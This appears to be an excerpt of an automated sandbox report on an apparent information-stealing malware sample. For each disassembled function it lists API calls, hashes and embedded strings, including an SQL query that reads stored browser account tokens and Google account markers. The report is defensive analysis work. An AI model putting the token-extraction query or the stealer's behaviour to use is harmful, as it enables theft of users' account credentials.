Opcode ID: 9ec93bf6f7c87f2ceb4773806783708a3b98f20147c784a0eb4cdbfe62cfe75e
Instruction ID: 880aa7099c32ada207d12d287bdc21f03df6f0a087d5f8e9e7d73c5066cf9203
Opcode Fuzzy Hash: 9ec93bf6f7c87f2ceb4773806783708a3b98f20147c784a0eb4cdbfe62cfe75e
Instruction Fuzzy Hash: 5C3125F5A0522AEBE318CF25CC80A97B3B8EF58215F100265FD0596612D735ED58CBF2

Uniqueness

Uniqueness Score: -1.00%

Function 00414500 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0041452E
memset.MSVCRT ref: 0041453A
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,00000000), ref: 0041454F

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,01562EF0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

ShellExecuteEx.SHELL32(0000003C), ref: 004145F1
memset.MSVCRT ref: 004145FE
memset.MSVCRT ref: 00414610
ExitProcess.KERNEL32 ref: 00414621

Strings

<, xrefs: 004145C9

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: memset$lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
String ID: <
API String ID: 1943017432-4251816714
Opcode ID: fa61bad28b9fa6bf749e961c07963be30b3881d2093b9f200ee653d6053f849b
Instruction ID: 40106b6c34474a18d672d20360bd6d15e979737cd144eebdb7cb1047f618d409
Opcode Fuzzy Hash: fa61bad28b9fa6bf749e961c07963be30b3881d2093b9f200ee653d6053f849b
Instruction Fuzzy Hash: E43150B1C00248EBDB04EFA5CC91EEEBBB8AF19304F50415EF20577182DB785A48CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00410C10 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

CreateDCA.GDI32(01562F10,00000000,00000000,00000000), ref: 00410C2A
GetDeviceCaps.GDI32(00000000,00000008), ref: 00410C35
GetDeviceCaps.GDI32(00000000,0000000A), ref: 00410C40
ReleaseDC.USER32(00000000,00000000), ref: 00410C4B
GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000001,?,?,00415FBA,?,00000000,?,Display Resolution: ,00000000,?,00428460,00000000), ref: 00410C58
HeapAlloc.KERNEL32(00000000,?,?,00000001,?,?,00415FBA,?,00000000,?,Display Resolution: ,00000000,?,00428460,00000000,?), ref: 00410C5F
wsprintfA.USER32 ref: 00410C6F

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Strings

%dx%d, xrefs: 00410C69

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CapsDeviceHeap$AllocCreateProcessReleaselstrcpywsprintf
String ID: %dx%d
API String ID: 3940144428-2206825331
Opcode ID: fa3c6274f822142a20cc3ebfe296ed34c019a70a2d3d3122d6912a561d387fb8
Instruction ID: 10970bef041411397078d824575da1c8168c4890c013ef65725a28c434970ae3
Opcode Fuzzy Hash: fa3c6274f822142a20cc3ebfe296ed34c019a70a2d3d3122d6912a561d387fb8
Instruction Fuzzy Hash: D101D6357413107BE32027A5AC0EF5B7A9EEB0AB52F500015FB04D71D0CAB0180087E9

Uniqueness

Uniqueness Score: -1.00%

Function 1C269700 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 277COMMON

Download Yara Rule

Strings

(FK), xrefs: 1C2698D3

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID: (FK)
API String ID: 0-1642768157
Opcode ID: 74c7ccbe78e0f5accfaf9dd0e16e5500cce8c0f13c346b608a6b6131258987f5
Instruction ID: 4e914faf54868af7a6317347769dd2a580b944b4501ca6b7bddb07587d8fd4db
Opcode Fuzzy Hash: 74c7ccbe78e0f5accfaf9dd0e16e5500cce8c0f13c346b608a6b6131258987f5
Instruction Fuzzy Hash: BA81E5B67052509FE700DF18EC40B96F3A1FB84235F30476EF946866A1EB32E455DB60

Uniqueness

Uniqueness Score: -1.00%

Function 1C259DA0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 160COMMON

Download Yara Rule

Strings

[%!g,%!g],, xrefs: 1C259E7E
[%!g,%!g]], xrefs: 1C259EC0

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID: [%!g,%!g],$[%!g,%!g]]
API String ID: 0-3388633204
Opcode ID: 477bea589b159afae09ca09df4d04ade9173d87c7ed32319b00d79ed173895f8
Instruction ID: e6861bed781924d3ee1f8a7b70de4c391b270a4b6b948212fd05c73228c9ed5c
Opcode Fuzzy Hash: 477bea589b159afae09ca09df4d04ade9173d87c7ed32319b00d79ed173895f8
Instruction Fuzzy Hash: A751F570B04752DBD710EF29CCC4B9BB7B4AF46310F104629F84996251E772E94ACBB2

Uniqueness

Uniqueness Score: -1.00%

Function 00408EB0 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 340stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,01562EF0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Part of subcall function 004070D0: memcmp.MSVCRT ref: 0040710B
Part of subcall function 004070D0: memset.MSVCRT ref: 00407139
Part of subcall function 004070D0: LocalAlloc.KERNEL32(00000040,?), ref: 00407170

lstrlen.KERNEL32(00000000), ref: 00409105

Part of subcall function 00411750: LocalAlloc.KERNEL32(00000040,?,00000000,00000001,00000004,?,00413F63,00000000,00000000), ref: 0041176C

StrStrA.SHLWAPI(00000000,AccountId), ref: 0040912B
lstrlen.KERNEL32(00000000), ref: 00409214
lstrlen.KERNEL32(00000000), ref: 00409228

Strings

AccountId, xrefs: 00409125
GoogleAccounts, xrefs: 00408F7A
GoogleAccounts, xrefs: 00408EF6
SELECT service, encrypted_token FROM token_service, xrefs: 00409069

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$AllocLocallstrcat$memcmpmemset
String ID: AccountId$GoogleAccounts$GoogleAccounts$SELECT service, encrypted_token FROM token_service
API String ID: 2910778473-1713091031
Opcode ID: 7843d1ef2307267bca2605904175fa092510784e571902047d6404226b4667fd
Instruction ID: c4cb561b851d9ad46cf7f56b89ea9e95a2426b849739b0bc6f678560fdc0b582
Opcode Fuzzy Hash: 7843d1ef2307267bca2605904175fa092510784e571902047d6404226b4667fd
Instruction Fuzzy Hash: 09D18271805248EACB14E7E5D955BDDBBB8AF19308F1440AEF906B3282DF785B08C779

Uniqueness

Uniqueness Score: -1.00%

Function 1C26B6E0 Relevance: 12.1, APIs: 8, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd608b541bacd9c350a0422b3ea719d242be6dbd201229cc55da3e177261aad8
Instruction ID: c9adc158cd21f68d7ce7a661bf51d9a7851290027fd7276c2639ac12c5c638e4
Opcode Fuzzy Hash: bd608b541bacd9c350a0422b3ea719d242be6dbd201229cc55da3e177261aad8
Instruction Fuzzy Hash: 91113BFA8042107FD605EB20EC40EFB7769EF82310F6405A4F8458B210E736E91DD2B6

Uniqueness

Uniqueness Score: -1.00%

Function 1C2C7920 Relevance: 10.8, APIs: 7, Instructions: 338COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c0a64c567377825aa826e38cd61e7aab24cd6bc2d57a6723dcf8eefeade29f
Instruction ID: 0b6f46e3d04408d4d73e964d0f239f22f765377d489c7338412117f35269c6b3
Opcode Fuzzy Hash: d7c0a64c567377825aa826e38cd61e7aab24cd6bc2d57a6723dcf8eefeade29f
Instruction Fuzzy Hash: D0B1C1B6B04302ABD704CF29CC81A9AB7E5FF88614F544639F948D3711E735F9148BAA

Uniqueness

Uniqueness Score: -1.00%

Function 1C265930 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 234COMMON

Download Yara Rule

Strings

CREATE TABLE x(input, token, start, end, position), xrefs: 1C265933
unknown tokenizer: %s, xrefs: 1C265B28
simple, xrefs: 1C265A38, 1C265A84, 1C265A95, 1C265B27

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID: CREATE TABLE x(input, token, start, end, position)$simple$unknown tokenizer: %s
API String ID: 0-2679805236
Opcode ID: d71dd6855d65e142a49b849b5fbd3670c6ff654a252e42f22f9e5292e5326c99
Instruction ID: a1db3a3b44045d35185baf3b493f51bb812f12676fc31be14e7505971f7a8d4f
Opcode Fuzzy Hash: d71dd6855d65e142a49b849b5fbd3670c6ff654a252e42f22f9e5292e5326c99
Instruction Fuzzy Hash: 6771D071A043268BD704CF28CC84A9AB7E4FF84214F180639FC49D7605EB75E989CBB6

Uniqueness

Uniqueness Score: -1.00%

Function 1C273F30 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 169COMMON

Download Yara Rule

Strings

remove_diacritics=1, xrefs: 1C273FA2
remove_diacritics=2, xrefs: 1C274021
tokenchars=, xrefs: 1C27406A
separators=, xrefs: 1C2740A3
remove_diacritics=0, xrefs: 1C273FE1

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID: remove_diacritics=0$remove_diacritics=1$remove_diacritics=2$separators=$tokenchars=
API String ID: 0-131617836
Opcode ID: d12a72049692d2757114506acbf1a456984d12d9688b5c07537bd081a3b0d12b
Instruction ID: ec3d382801994851592c37f4ef01a7e68e6b59beb9db77ec758c569a077a4d98
Opcode Fuzzy Hash: d12a72049692d2757114506acbf1a456984d12d9688b5c07537bd081a3b0d12b
Instruction Fuzzy Hash: AA5107766043838BE304DF14C4C47A6B7B1BB62324F9542A8F84A5B645DB32ED86CF72

Uniqueness

Uniqueness Score: -1.00%

Function 1C3015C0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 135COMMON

Download Yara Rule

Strings

JSON cannot hold BLOB values, xrefs: 1C3016D9
null, xrefs: 1C3015EE
%!0.15g, xrefs: 1C30160A

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID: %!0.15g$JSON cannot hold BLOB values$null
API String ID: 0-3074873597
Opcode ID: 115328562ebab5b63f2dc009ae5187214623f22331db2ed0b8525a1113d62c70
Instruction ID: dcaba50559d87c821be57db39c58423cdc20211f70d269f2f0c952e005acdaed
Opcode Fuzzy Hash: 115328562ebab5b63f2dc009ae5187214623f22331db2ed0b8525a1113d62c70
Instruction Fuzzy Hash: 38419BB76007006BF3105BD4EC81BE777A8DB41329F180729F951825C2D3A9A1BC8BF6

Uniqueness

Uniqueness Score: -1.00%

Function 1C271D50 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 132COMMON

Download Yara Rule

Strings

CREATE TABLE x( name TEXT, path TEXT, pageno INTEGER, pagetype TEXT, ncell INTEGER, payload INTEGER, unused INTEGER, mx_payload INTEGER, pgoffset INTEGER, pgsize INTEGER, schema TEXT HIDDEN, aggregate BOOLEAN HIDDEN), xrefs: 1C271E2C
no such database: %s, xrefs: 1C271E05

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID: CREATE TABLE x( name TEXT, path TEXT, pageno INTEGER, pagetype TEXT, ncell INTEGER, payload INTEGER, unused INTEGER, mx_payload INTEGER, pgoffset INTEGER, pgsize INTEGER, schema TEXT HIDDEN, aggregate BOOLEAN HIDDEN)$no such database: %s
API String ID: 0-1404816483
Opcode ID: 05ce8c07fecf4b0756e3c9621c56ee2ad2d6006ff046dc4ad4f08fe55f97ba5f
Instruction ID: 0b85057435c17c55fb91472bac53e4fafa75d75294cc140e6d897145792bec92
Opcode Fuzzy Hash: 05ce8c07fecf4b0756e3c9621c56ee2ad2d6006ff046dc4ad4f08fe55f97ba5f
Instruction Fuzzy Hash: B031597660030A6BC3109FAADC40FABB7D8EF45215F110669FD5C9B240EA76F9048BF6

Uniqueness

Uniqueness Score: -1.00%

Function 004118E0 Relevance: 10.5, APIs: 4, Strings: 3, Instructions: 43stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(01572060,?,00000104,00000000,?,00412525,?,01572060,00000000), ref: 004118ED
lstrcpyn.KERNEL32(C:\Users\user\Desktop\,01572060,00000000,00000000,?,00412525,?,01572060,00000000), ref: 0041190B
lstrlen.KERNEL32(?,?,00412525,?,01572060,00000000,?,?,?,?,?,?,?,00000000), ref: 0041191E
wsprintfA.USER32 ref: 00411931

Strings

%s%s, xrefs: 0041192B
%%A, xrefs: 00411924, 0041192A
C:\Users\user\Desktop\, xrefs: 00411906, 0041193C

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: %%A$%s%s$C:\Users\user\Desktop\
API String ID: 1206339513-1083490418
Opcode ID: b3af0c830d7c66efbf35a3d675616cfa4270fd700d5d968e88c3d55ec8686320
Instruction ID: c5a9d92ede5ea4987b478224b8b0572e4dbdbd0cbd861403dae5f6f932e9b4ff
Opcode Fuzzy Hash: b3af0c830d7c66efbf35a3d675616cfa4270fd700d5d968e88c3d55ec8686320
Instruction Fuzzy Hash: 7EF0F0762402096FDB005F5CEC88DEBBBEEEF8A364B505116F9088B300CB359C82C6B0

Uniqueness

Uniqueness Score: -1.00%

Function 00412070 Relevance: 9.1, APIs: 6, Instructions: 115stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 004120B0
StrCmpCA.SHLWAPI(00000000,00428340,?,?,?,00000000), ref: 004120FC
StrCmpCA.SHLWAPI(00000000,00428344,00000000,?,?,?,00000000), ref: 00412142
StrCmpCA.SHLWAPI(00000000,00428348,?,?,?,00000000), ref: 0041216E
StrCmpCA.SHLWAPI(00000000,0042834C,?,?,?,00000000), ref: 0041219A
strtok_s.MSVCRT ref: 004121CC

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: strtok_s
String ID:
API String ID: 3330995566-0
Opcode ID: 8ab808e521ad988e47ca2df6490754f693fd19acd19366fb3acbd8f1064129c7
Instruction ID: e7a2fe36a0400bda3f7ffef75447838ffcf0b53659d9e15460f3b2746b801767
Opcode Fuzzy Hash: 8ab808e521ad988e47ca2df6490754f693fd19acd19366fb3acbd8f1064129c7
Instruction Fuzzy Hash: 11419E74600205EFCB10DF58D944BE9B7B8FF15304FA0465EE605D3284DBB9A6B8CBA9

Uniqueness
